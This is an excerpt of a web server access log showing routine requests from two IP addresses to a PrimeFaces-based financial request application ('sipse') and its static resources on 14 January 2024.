186.80.52.0 - - [14/Jan/2024:00:53:45 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
186.80.52.0 - - [14/Jan/2024:00:53:47 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 32445
186.80.52.0 - - [14/Jan/2024:00:53:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 32445
186.80.52.0 - - [14/Jan/2024:00:53:56 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 32445
186.80.52.0 - - [14/Jan/2024:00:53:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 32530
186.80.52.0 - - [14/Jan/2024:00:54:16 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 124407
186.80.52.0 - - [14/Jan/2024:00:54:17 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:54:17 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:54:17 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:54:17 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:54:17 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:54:17 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:54:17 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [14/Jan/2024:00:54:22 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
186.80.52.0 - - [14/Jan/2024:00:54:27 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 47226
186.80.52.0 - - [14/Jan/2024:00:54:27 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.0 - - [14/Jan/2024:00:54:27 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
